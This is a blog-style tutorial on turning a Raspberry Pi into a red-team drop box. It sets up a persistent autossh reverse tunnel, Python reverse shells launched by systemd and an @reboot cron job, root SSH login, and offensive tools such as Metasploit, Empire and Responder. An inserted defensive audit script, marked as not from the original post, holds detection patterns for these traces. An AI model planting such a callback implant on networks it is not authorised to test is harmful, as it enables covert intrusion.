Build A Raspberry Pi Dropbox

I'm leaving this here for a bit as I have not finished my other post, but there is a much better way to do this which I use in red teams.

I have created a script to automate all of this, so this writeup is obsolete:
https://github.com/jdksec/RpiPentestingDropbox
First download and install Raspbian onto an SD card. There are loads of guides on how to do this.
I chose the Lite version, which is perfect for making something speedy; I did not want it bloated with GUI packages I would never use.
Win32 Disk Imager is my preference as it writes the entire SD card in one hit. Other Linux methods work just as well.
Insert the card, boot the Pi and log in with the username and password pi:raspbian
Change your password to something strong:
sudo su # become root
passwd pi # set a strong password
passwd root # set a strong password
Now make sure you have ssh listening on your "attacker machine":
service ssh start
If it is not installed yet, install openssh-server:
apt-get install openssh-server
# Regenerate the host keys if they are missing (dpkg -i expects a .deb file and will not do this)
dpkg-reconfigure openssh-server
Now you want to enable ssh on the Pi so it is ready every time it boots.
ifconfig # to get your current IP
raspi-config
Select "5 Interfacing Options"
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99c4380fd55.png
Then select SSH and enable it.
Reboot the Pi and try to log in with your current IP.
Now that this is working you need to configure autossh:
sudo su # become root
apt-get install autossh
useradd -m -s /sbin/nologin piusername
su - piusername -s /bin/bash
ssh-keygen
(Don't set a passphrase)
Now you need to create a user on your attacker machine for the pi to connect to.
useradd -m -s /bin/bash localusername
passwd localusername #set a very secure password as this will be open
Ensure you can log in via your localhost.
Once that is verified move to the next step.
You need to copy over your ssh id to the remote server.
The ideal way to do this is to add it manually (copy and paste via ssh), although you can use the following:
ssh-copy-id [email protected]
Seeing as I was logged in via ssh, I copied and pasted my id into a newly created authorized_keys file in /root/.ssh/
Make sure the permissions are all good.
chmod 600 /root/.ssh/*
Also ensure you allow root login.
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
There are several ways to create a startup file, but I prefer to create a new systemd service as this has proven the most reliable.
Steps to do that are as follows:
nano /etc/systemd/system/autossh.service
Create the file with the following contents:
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99cc0734551.png
Now run the following commands
systemctl daemon-reload
systemctl start autossh.service
systemctl status autossh.service
If you see this, you are good to go to the next step:
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99cd98ecbe0.png
Now enter the following command on your attacker machine.
ssh [email protected] -p 2222
If you can log in then you are good to go. The Pi will create a reverse tunnel whenever autossh.service is started.
The last command you need to run to enable autossh on boot is:
systemctl enable autossh.service
Provided all the above worked without errors (there may be some depending on your configuration), reboot the machine and wait until you can ssh into the Pi:
ssh [email protected] -p 2222
Installing Tools
Once that is up and running you can start installing your tools. Most of these are easy and work out of the box; some are more difficult and I have detailed them below.
If you want a list of the basic tools I installed they are below:
apt-get install nmap wifite cutycapt screen locate
Metasploit Install
This was a bit of a nightmare as it will not work out of the box on this old Raspberry Pi; if it does not work for you, be prepared to google your errors.
You need to install a load of tools and dependencies to get this up and running, so I am already missing Kali, but I will press ahead and get it working as I want this on the machine.
I managed to strip it down to the following:
cd /opt
git clone https://github.com/rapid7/metasploit-framework.git
Now install some stuff
apt-get -y install build-essential zlib1g zlib1g-dev libxml2 libxml2-dev libxslt-dev locate libreadline6-dev libcurl4-openssl-dev git-core libssl-dev libyaml-dev openssl autoconf libtool ncurses-dev bison curl wget postgresql postgresql-contrib libpq-dev libapr1 libaprutil1 libsvn1 libpcap-dev git-core postgresql curl ruby nmap gem bundler
Most of these will already be installed
Before you can move on and install Metasploit you need a few other bits; the following worked for me (you may need to tweak it):
apt-get install libsqlite3-dev
# if that does not work
gem install sqlite3 -v '1.3.13'
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99dcbb68344.png
The next command takes ages and appears to do nothing (it warns you) but give it time.
gem install nokogiri -v '1.8.2'
After about 9 months you should see this:
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99da239039e.png
Once they are installed we can "try":
bundle install
You will get a warning about running bundler as root and a recommendation to install bundler via gem, but I carried on regardless as this is just a test.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99de5f72f11.png
At this point the Pi became unresponsive, so it's a good time to test the autossh viability.
I pulled the power cable to give it a hard reset, plugged it back in, and within 40 seconds I had an ssh connection.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99e101cfce6.png
Considering the last response from bundler, I decided to update it:
gem install bundler
This took a while on a fresh boot, but we are nearly there.
Now it is actually working.
This installed and seemed to work, so let's see how the Raspberry Pi handles msfconsole.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99e451bfbce.png
Wow, it was faster than I thought and took about 45 seconds.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99e5a745ee7.png
Let's test it out with a reverse shell; it looks like it is working so far.
Create one with msfvenom on your attacker machine.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99e793db527.png
Set up a listener
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99e7cd6d996.png
Execute the shell
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99e84b39545.png
Watch your listener for a shell
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99e86ede455.png
It works.
Looks like the latest exploits are installed as well so we can move on to the next tool.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99e8eb0ec1b.png
Add an alias to .bashrc with the following command so msfconsole runs from any directory, or add it to your bin.
(FYI I tweaked my .bashrc at this point to make my console stand out)
echo "alias msfconsole='/opt/metasploit-framework/msfconsole'" >> ~/.bashrc
source ~/.bashrc
Test it works
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99f2fc317d7.png
Also add msfvenom to your .bashrc for easy shells:
echo "alias msfvenom='/opt/metasploit-framework/msfvenom'" >> ~/.bashrc
source ~/.bashrc
Creating other methods of access
Now we want to add a few other shells in case we are unable to get autossh out through the firewall, to make sure you can still access the machine.
We will use python as the ARM architecture does not play well with msfvenom.
Reverse HTTPS python shell (port 80):
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c5ae90ddba.png
Reverse HTTPS python shell:
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9ae21c5a85f.png
Reverse python HTTPS shell via port 53
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9adfbb1b284.png
Now create the following file on your attacker machine called meterpreter.rc.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c5a2aa3d92.png
Run the .rc file with the below command:
msfconsole -q -r meterpreter.rc
Check your shells work
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9ae2d6af472.png
Shells received.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9ae45bab424.png
These are pretty handy if you have some local tools you want to run against the host or if you want to pivot with Metasploit.
Now create three services in /etc/systemd/system with the following contents:
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c52f09b047.png
Start each of the services to make sure they work.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c5463da760.png
Enable your services to start at boot.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c54b28f14d.png
Exit meterpreter and start your handlers from scratch.
msfconsole -q -r meterpreter.rc
Reboot the Pi and you should see three shells come back.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c5bcadf990.png
Now we have four ways for our Pi to call back to us.
Another method, which may be easier, is to create a cron job.
Create the following file, Shells.sh:
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c639694fdc.png
Make the file executable
chmod +x Shells.sh
Open crontab with
crontab -e
Add the following entry:
@reboot /bin/bash /root/Shells.sh
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c63e50fc0d.png
Save, exit and reboot the Pi.
Open your listener again and after a while you should see your shells come back.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c64a5cebf6.png
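For the other side of the table, here is a host-side check for the footprint this section builds (an autossh unit, interpreter-launched services, an @reboot cron job and the PermitRootLogin change), as an added example that is not part of the original post. The sample unit, crontab and sshd_config contents are constructed and `tunnelhost` is a placeholder; the script also shows why appending PermitRootLogin yes with >> can silently do nothing, because sshd applies the first directive it reads.

```python
"""Audit a Debian/Raspbian host for the persistence footprint this writeup
leaves behind. Added example, not part of the original post: it flags systemd
ExecStart lines that launch autossh or a script interpreter, @reboot crontab
entries, and checks which PermitRootLogin value sshd will actually apply.
Inputs in demo() are constructed; real files live under /etc."""
import re

# Command shapes worth a human look; a match is a lead, not a verdict.
SUSPECT = re.compile(r"\b(autossh\b|ssh\b.*\s-R\s|python[23]?\s+\S+\.py|bash\s+\S+\.sh)")

def audit_unit(name, text):
    """Flag ExecStart lines of one systemd unit that match SUSPECT."""
    return [f"{name}: {l.strip()}" for l in text.splitlines()
            if l.strip().lower().startswith("execstart=") and SUSPECT.search(l)]

def audit_crontab(text):
    """@reboot jobs run with no login at all; list every one for review."""
    return [f"crontab: {l.strip()}" for l in text.splitlines()
            if l.strip().startswith("@reboot")]

def permit_root_login_values(text):
    """Uncommented PermitRootLogin values in file order. sshd honours only the
    FIRST one, so 'yes' appended with >> after an earlier directive is ignored."""
    return [p[1].lower() for p in (l.split() for l in text.splitlines())
            if len(p) >= 2 and p[0].lower() == "permitrootlogin"]

def audit_sshd_config(text):
    vals = permit_root_login_values(text)
    eff = vals[0] if vals else "prohibit-password"  # upstream OpenSSH default
    findings = []
    if eff == "yes":
        findings.append("sshd_config: root login over SSH is permitted")
    if len(vals) > 1:
        findings.append(f"sshd_config: {len(vals)} PermitRootLogin lines; "
                        f"only the first applies (effective={eff})")
    return findings

def audit_host(units, crontab, sshd_config):
    """units maps unit file name -> contents. Returns all findings as strings."""
    out = [f for name, text in units.items() for f in audit_unit(name, text)]
    return out + audit_crontab(crontab) + audit_sshd_config(sshd_config)

def demo():
    """Constructed inputs mirroring the setup described in the writeup."""
    units = {"autossh.service": "[Service]\nExecStart=/usr/bin/autossh -M 0 -N -R 2222:localhost:22 piusername@tunnelhost\n",
             "cron.service": "[Service]\nExecStart=/usr/sbin/cron -f\n"}
    crontab = "@reboot /bin/bash /root/Shells.sh\n0 3 * * * /usr/bin/apt-get update\n"
    sshd = "PermitRootLogin prohibit-password\nPasswordAuthentication yes\nPermitRootLogin yes\n"
    return audit_host(units, crontab, sshd)

if __name__ == "__main__":
    print("\n".join(demo()))
```

On a real host, feed it the contents of /etc/systemd/system/*.service, `crontab -l` for root and /etc/ssh/sshd_config; the benign cron.service and the daily apt job in the demo show that ordinary units and cron lines are not flagged.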
Searchsploit
git clone https://github.com/offensive-security/exploit-database.git /opt/exploit-database
Not sure why you would not have this on your local machine, but it always helps.
Make searchsploit executable and test it:
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99ed186ef24.png
It works, so add it to your .bashrc file.
Be careful not to overwrite it (append with >>, not >):
echo "alias searchsploit='/opt/exploit-database/searchsploit'" >> ~/.bashrc
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99eff96ee52.png
Type the following:
source ~/.bashrc
Check it works outside of the exploitdb folder
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99f0796dc99.png
Python
Raspbian comes with python installed.
First we will install pip (easy python installs):
apt-get install python-pip
You can add your tools via pip as you need them, but just for a demo (this was already installed):
python -m SimpleHTTPServer 81
Let's see what we can host internally:
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99fb0d36438.png
OK, happy with that; not my best fake website but you get the idea.
Nishang
cd /opt/
git clone https://github.com/samratashok/nishang.git
The best powershell reverse shell I have found so far, which you can host via python.
This combined with a Bash Bunny is really handy.
Unicorn
Another amazing powershell tool you want on this machine
cd /opt/
git clone https://github.com/trustedsec/unicorn.git
Responder
cd /opt/
git clone https://github.com/SpiderLabs/Responder.git
Very good tool
Empire
Another tool to add which will be useful for internal tests.
cd /opt
git clone https://github.com/adaptivethreat/Empire.git
cd Empire/setup
apt-get install python-m2crypto
pip install pyminifier
./install.sh
Once installed you should see this:
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9ac6ba404da.png
Social Engineer Toolkit
Another great tool; most of the dependencies are already installed.
cd /opt
git clone https://github.com/trustedsec/social-engineer-toolkit.git
cd social-engineer-toolkit
python setup.py install
Setup should end like this:
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9b09f464633.png
Now SET is installed:
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9b0a31ef977.png